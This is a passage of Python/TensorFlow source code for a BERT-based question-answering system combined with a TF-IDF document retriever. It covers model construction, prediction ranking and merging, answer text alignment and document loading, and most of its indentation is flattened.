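  assert not _check_is_max_context(spans, 1, position)
  assert _check_is_max_context(spans, 2, position)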
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
if FollowInitTPU == 1 :
print('model_fn_builder Start')
#unique_ids = features["unique_ids"]
unique_ids = features["label_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
if FollowInitTPU:
print('Start in the def tpu_scaffold()')
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
if FollowInitTPU:
print('End in the def tpu_scaffold()')
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
print("Start in the TPUEstimatorSpec")
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
print("End in the TPUEstimatorSpec")
else:
raise ValueError(
"Only TRAIN and PREDICT modes are supported: %s" % (mode))
if FollowInitTPU == 1 :
print('model_fn_builder End')
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
if FollowInitTPU == 1:
print ('Start in input_fn_builder')
name_to_features = {
"unique_ids": tf.io.FixedLenFeature([], tf.int64),
"input_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.io.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.io.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.io.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
if FollowInitTPU == 1:
print ('Start in _decode_record')
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
if FollowInitTPU == 1:
print ('End in _decode_record')
return example
def input_fn(params):
"""The actual input function."""
if FollowInitTPU == 1:
print ('Start in input_fn')
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.data.experimental.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
if FollowInitTPU == 1:
print ('End in input_fn')
return d
if FollowInitTPU == 1:
    print ('End in input_fn_builder')
return input_fn
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case
):
"""Write final predictions to the json file and log-odds of null if needed."""
global ranker
'''
tf.compat.v1.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.compat.v1.logging.info("Writing nbest to: %s" % (output_nbest_file))
tf.compat.v1.logging.info("Writing Aten predic to: %s" % (output_Aten_predict_file))
'''
ans_list = []
text_list = []
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
#tf.compat.v1.logging.info("length of all_results: %d" % (len(all_results)))
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
# Willy Addd collections -> for results
#-------------------------------------------------------------------------------
_AllPredictions = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictions",
["question", "PredictListOneQues"])
_AllPredictResultsInOneQuestion = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneQuestion",
["doc_text", "doc_id", "doc_score", "PredictListOneDoc"])
_AllPredictResultsInOneDocument = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneDocument",
["answer", "prob", "start", "end"])
_FinalResult = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult",
["question", "text", "text_id", "ans", "prob"])
_FinalResult2 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult2",
["question", "text", "ans", "prob"])
_FinalResult3 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult3",
["question", "text", "ans", "ans_prob", "TFIDF", "Score", "choice"])
_FinalResultAll = collections.namedtuple( # pylint: disable=invalid-name
"FinalResultAll",
["question", "text1", "ans1", "ans_prob1", "TFIDF1", "Score1", "text2", "ans2", "ans_prob2", "TFIDF2", "Score2", "choice"])
_TempAllpredict_Layer1 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer1",
["question" , "TempAllpredictList_Layer2"])
_TempAllpredict_Layer2 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer2",
["doc_id","doc_text","best_ans","best_prob"])
#-------------------------------------------------------------------------------
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
all_predicts = []
all_predictsInOneQues = []
quesList = []
Aten_result_list = []
Aten_result3_list = []
TempAllpredictLayer1_list = []
TempAllpredictLayer2_list = []
best_answer=""
best_prob=0.0
ans_is_null = True
#ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
if example_in_write_predictions == 1:
print ("example idx:%d" %example_index)
print("question in example from predict")
print(example.question_text)
print("doc_tokens in example from predict")
print(example.doc_tokens)
print('-'*60)
print('\n')
doc_names = []
doc_scores = []
try:
doc_names, doc_scores = ranker.closest_docs( example.question_text, 10 )
except:
doc_names.append('None')
doc_scores.append(0)
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
    min_null_feature_index = 0  # the paragraph slice with min null score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
    # if we didn't include the empty option in the n-best, include it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
    # for reference
probs = _compute_softmax(total_scores)
nbest_json = []
for i, entry in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
#----------------------------------------------
# presupposition : Question is in order
#"question", "PredictResults"
if example.question_text not in quesList :
if len(quesList)!=0 :
#1. Save to all predicts
#print('all_predictsInOneQues-')
#print(all_predictsInOneQues)
temp = copy.deepcopy(all_predictsInOneQues)
#print('temp')
#print(temp)
all_predicts.append(
_AllPredictions(
question=quesList[-1],
PredictListOneQues=temp
)
)
#2.TODO : Find the result (move to outside)
#3. reset all_predictsInOneQues
all_predictsInOneQues.clear()
#. Add to questList
quesList.append(example.question_text)
#----------------------------------------------
# save answer dataset
#----------------------------------------------
all_predictsInOneDoc = []
#print('go to (1)')
for i, entry in enumerate(nbest):
tp_answer = entry.text
#print('ids:%d:%s' %(i,tp_answer))
for i, entry in enumerate(nbest):
tp_answer = entry.text
if len(all_predictsInOneDoc) != 0:
break
temp = tp_answer.replace(" ", "")
if not temp:
continue
if len(tp_answer) < 3:
if not RepresentsInt(tp_answer):
continue
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
if len(all_predictsInOneDoc) == 0:
for i, entry in enumerate(nbest):
if predict_result_index == 1:
print(entry)
if i == 2:
if predict_result_index == 1:
print('In state 2')
break
tp_answer = entry.text
if i == 0:
if tp_answer.isspace() or not tp_answer:
if predict_result_index == 1:
print('In state 0,tp_ans: %s' % tp_answer)
continue
if i == 1 and len(all_predictsInOneDoc) != 0:
if predict_result_index == 1:
print('In state 1,tp_ans: %s' % tp_answer)
break
if predict_result_index == 1:
print('In state set pridict. tp_ans: %s' % tp_answer)
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
nbest.clear()
#print('go to (2)')
#----------------------------------------------
# End of save answer dataset
if predict_result_index == 1:
for i, entry in enumerate(all_predictsInOneDoc):
print('index:%d' %i)
print("answer: %s" %(entry.answer))
print("prob: %s" %(entry.prob))
print("start: %s" %(entry.start))
print("end: %s" %(entry.end))
print('\n')
print('-'*15)
print('\n')
#----------------------------------------------
tp_docscore = 0.0
if example.doc_id in doc_names :
tp_docindex = doc_names.index(example.doc_id)
tp_docscore = doc_scores [tp_docindex]
#print('go to (4)')
#print('go to (5)')
#print('all_predictsInOneQues-in set')
#print(all_predictsInOneQues)
all_predictsInOneQues.append(
_AllPredictResultsInOneQuestion(
doc_text=example.doc_tokens,
doc_id=example.doc_id,
doc_score=tp_docscore,
PredictListOneDoc=all_predictsInOneDoc
)
)
#----------------------------------------------
# if example is examples last data
if example == all_examples[-1] :
all_predicts.append(
_AllPredictions(question=example.question_text,PredictListOneQues=all_predictsInOneQues))
#----------------------------------------------
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
if best_non_null_entry == None :
score_diff = FLAGS.null_score_diff_threshold + 1.0
else:
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
# Find the best answer from Aten collections
#----------------------------------------------
retriever_weight = FLAGS.retriever_weight
for i, entry_predicts in enumerate(all_predicts):
tp_ques = entry_predicts.question
QuesList = entry_predicts.PredictListOneQues
#print("ques: %s" %(tp_ques))
# set score only with bert , TF-IDF used to be choice doc.
#----------------------------------------------
QuesList.sort(key=TakeThird, reverse=True)
#print('len with QuesList:%d' %len(QuesList))
tp_text1 = QuesList[0].doc_text
text1=""
for word in tp_text1:
text1= text1 + " " + word
ans1=""
ans1_prob = 0.0
TFIDF1 = QuesList[0].doc_score
Score1 = 0.0
entry_OneDoc = QuesList [0].PredictListOneDoc
if len(entry_OneDoc) != 0 :
ans1 = entry_OneDoc[0].answer
ans1_prob = entry_OneDoc[0].prob
for k, entry_OneAns in enumerate(entry_OneDoc):
#print('index:%d' %k)
tp_ans1_prob = Decimal(entry_OneAns.prob)
if tp_ans1_prob > ans1_prob:
ans1_prob = tp_ans1_prob
ans1 = entry_OneAns.answer
#print('Ans_ans:%s' %(entry_OneAns.answer))
#print('Ans_prob:%e , start:%e , end:%e' %(entry_OneAns.prob , entry_OneAns.start , entry_OneAns.end))
Score1 = ans1_prob
#----------------------------------------------
# set score with bert and TF-IDF
#----------------------------------------------
text2=""
ans2=""
ans2_prob = 0.0
TFIDF2 = 0.0
Score2 = 0.0
for j , entry_OneDoc in enumerate(QuesList):
tp_TFIDF2 = entry_OneDoc.doc_score
tp_text2=""
for word in entry_OneDoc.doc_text:
tp_text2 = tp_text2 + " " + word
DocList = []
DocList = entry_OneDoc.PredictListOneDoc
for k, entry_OneAns in enumerate(DocList):
tp_ans2_prob = Decimal(entry_OneAns.prob)
tp_Score2 = Decimal(retriever_weight)*Decimal(tp_TFIDF2) + Decimal(1.0-retriever_weight)*Decimal(tp_ans2_prob)
if tp_Score2>Score2:
text2=tp_text2
ans2=entry_OneAns.answer
ans2_prob=tp_ans2_prob
TFIDF2=tp_TFIDF2
Score2 =tp_Score2
#----------------------------------------------
fin_text = text1
fin_ans = ans1
fin_ans_prob = ans1_prob
fin_TFIDF = TFIDF1
fin_Score = Score1
choice_value = 0
if TFIDF1<FLAGS.choice_score:
print("Answer2 State1")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
elif ans2_prob>ans1_prob*2 and ans2_prob > FLAGS.threshold_prob_ans_merge:
print("Answer2 State2")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
else:
use_ans2 = False
if len(ans1)<3:
print("Answer2 State3,len=%d" %len(ans1))
use_ans2 = True
else:
for char in ans1:
print("Answer2 State4")
if char<' ' or char>'~' :
            print(ord(char))
use_ans2 = True
break
if use_ans2 == True :
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
else:
print("Answer1 State1")
ans_list.append(fin_ans)
text_list.append(fin_text)
if FLAGS.show_all_choice == 0:
Aten_result3_list.append(
_FinalResult3(
question = tp_ques,
text = fin_text,
ans = fin_ans,
ans_prob = fin_ans_prob,
TFIDF = fin_TFIDF,
Score = fin_Score,
choice = choice_value
)
)
else :
Aten_result3_list.append(
_FinalResultAll(
question = tp_ques,
text1 = text1,
ans1 = ans1,
ans_prob1 = ans1_prob,
TFIDF1 = TFIDF1,
Score1 = Score1,
text2 = text2,
ans2 = ans2,
ans_prob2 = ans2_prob,
TFIDF2 = TFIDF2,
Score2 = Score2,
choice = choice_value
)
)
print('ques: %s' %tp_ques)
if FLAGS.show_all_choice==1:
print('-'*5)
print('Only Bert (TF-IDF used to be choice document):')
print('text: %s' %text1)
print('ans: %s' %ans1)
print('Show ans1:')
print('ans_prob: %s' %ans1_prob)
print('TFIDF: %s' %TFIDF1)
print('Score: %s' %Score1)
print('')
print('-'*5)
print('Merge TF-IDF:')
print('text: %s' %text2)
print('ans: %s' %ans2)
print('ans_prob: %s' %ans2_prob)
print('TFIDF: %s' %TFIDF2)
print('Score: %s' %Score2)
print('-'*5)
print('My Choice ans(%d):' %choice_value)
print('text: %s' %fin_text)
print('ans: %s' %fin_ans)
print('ans_prob: %s' %fin_ans_prob)
print('TFIDF: %s' %fin_TFIDF)
print('Score: %s' %fin_Score)
# ack message to Colab Client
#temp_answer = 'Dr_Answer' + fin_ans + 'Dr_QA' + fin_text + '<AtenEnd>'
Aten_result3_list.clear()
return ans_list, text_list
#return 'Dr_Answer' + fin_ans + 'Dr_QA' + fin_text + '<AtenEnd>'
'''
print('-'*5)
if excel_Answer_count == excel_count+1 :
print('-'*15)
print('\n')
if excel_Answer_count == excel_count :
ws['C' + str(excel_index)] = excel_Answer_count
ws['D' + str(excel_index)] = excel_NOtGoodAns_count
ws['F' + str(excel_index)] = excel_Intent_count
excel_index = excel_index+1
excel_Answer_count = const_AtenQuest_index[excel_index-1]
excel_NOtGoodAns_count = excel_NOtGoodAns_index[excel_index-1]
excel_Intent_count = const_AtenIntent_index[excel_index-1]
excel_count = 0
if excel_index <= len(const_AtenQuest_index) :
# print('Set my fin_Score with excel: %s' %fin_Score)
index_str = chr(73+excel_count) + str(excel_index)
ws[index_str] = fin_Score
excel_count = excel_count + 1
ws['A60'] = 'All'
ws['A61'] = '40QA'
ws['B59'] = 'Right answer'
ws['B60'] = '=SUM(B1:B40)+SUM(A41:A58)'
ws['B61'] = '=SUM(B1:B40)'
ws['C59'] = 'All answer'
ws['C60'] = '=SUM(C1:C58)-SUM(D1:D40)'
ws['C61'] = '=SUM(C1:C40)-SUM(D1:D40)'
ws['E59'] = 'Right Intent'
ws['E60'] = '=SUM(E1:E40)+SUM(A41:A58)'
ws['E61'] = '=SUM(E1:E40)'
ws['F59'] = 'All intent'
ws['F60'] = '=SUM(F1:F40)+SUM(C41:C58)'
ws['F61'] = '=SUM(F1:F40)'
ws['G59'] = 'answer prob'
ws['G60'] = '=B60/C60'
ws['G61'] = '=B61/C61'
ws['H59'] = 'Intent prob'
ws['H60'] = '=E60/F60'
ws['H61'] = '=E61/F61'
wb.save(FLAGS.excel_name + '.xlsx')
print('\n')
with tf.gfile.GFile(output_Aten_predict_file, "w") as writer:
writer.write(json.dumps(Aten_result3_list, indent=4,cls=DecimalEncoder) + "\n")
with tf.gfile.GFile(output_prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with tf.gfile.GFile(output_nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if FLAGS.version_2_with_negative:
with tf.gfile.GFile(output_null_log_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
'''
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
  # Therefore, we have to apply a semi-complicated alignment heuristic between
  # `pred_text` and `orig_text` to get a character-to-character alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.compat.v1.logging.info(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text, tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
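# Illustrative sketch added for clarity: a tiny example of how the two helpers above
# are typically combined when ranking candidate spans. The logit values are made up
# for demonstration; this helper is never called by the pipeline.
def _demo_rank_logits():
  start_logits = [0.1, 2.3, -1.0, 0.7]
  best = _get_best_indexes(start_logits, n_best_size=2)
  assert best == [1, 3]  # indexes of the two largest logits, best first
  probs = _compute_softmax([2.3, 0.7])
  assert abs(sum(probs) - 1.0) < 1e-6  # softmax probabilities sum to 1
  assert probs[0] > probs[1]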
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, filename, is_training):
self.filename = filename
self.is_training = is_training
self.num_features = 0
#self._writer = tf.python_io.TFRecordWriter(filename)
self._writer = tf.io.TFRecordWriter(filename)
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
self.num_features += 1
def create_int_feature(values):
feature = tf.train.Feature(
int64_list=tf.train.Int64List(value=list(values)))
return feature
features = collections.OrderedDict()
features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
if self.is_training:
features["start_positions"] = create_int_feature([feature.start_position])
features["end_positions"] = create_int_feature([feature.end_position])
impossible = 0
if feature.is_impossible:
impossible = 1
features["is_impossible"] = create_int_feature([impossible])
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
#print("tf_example:")
#print(tf_example)
self._writer.write(tf_example.SerializeToString())
def close(self):
self._writer.close()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_file:
raise ValueError(
"If `do_predict` is True, then `predict_file` must be specified.")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
# Retriever - added by Willy
if FLAGS.do_retriever:
if not FLAGS.retriever_model:
raise ValueError("You have to set retriever model(give the path) when you set do_retriever to Yes.")
if FLAGS.document_type != 'Sqlite' or FLAGS.db_file == None :
raise ValueError("You have to set document_type to Sqlit and set the db_file when you set do_retriever to Yes.")
# TODO : think a mechanism to chek these key word
'''
if FLAGS.document_type is 'SQlite':
# TODO: set database
elif FLAGS.document_type is 'Text':
# TODO: set text file
elif FLAGS.document_type is 'SQuAD':
# is original method
else :
raise ValueError(
"You have to set correct document_type: (1)'SQlite' (2)'Text' (3)SQuAD.")
'''
def read_squad_documents(input_file):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
documents = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
documents.append(paragraph["context"])
return documents
def read_sqlite_documents(input_file):
    """Read documents from a sqlite DB via the retriever's document database."""
    db_class = retriever.get_class('sqlite')
    documents = []
with db_class(input_file) as doc_db:
doc_ids = doc_db.get_doc_ids()
for ids in doc_ids:
documents.append(doc_db.get_doc_text(ids))
doc_db.close()
DOC2IDX = {doc_id: i for i, doc_id in enumerate(doc_ids)}
return DOC2IDX, documents
def read_text_documents(input_file):
    """Read documents from a plain text file, one document per non-empty line."""
    with open(input_file, "r") as f:
        documents = f.read()
    documents_split = documents.split('\n')
    documents_final = list(filter(None, documents_split))
    return documents_final
def read_squad_question(input_file):
questions = []
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
questions.append(qa["question"])
return questions
def set_eval_examples(questions, DOC2IDX):
def is_whitespace(c):
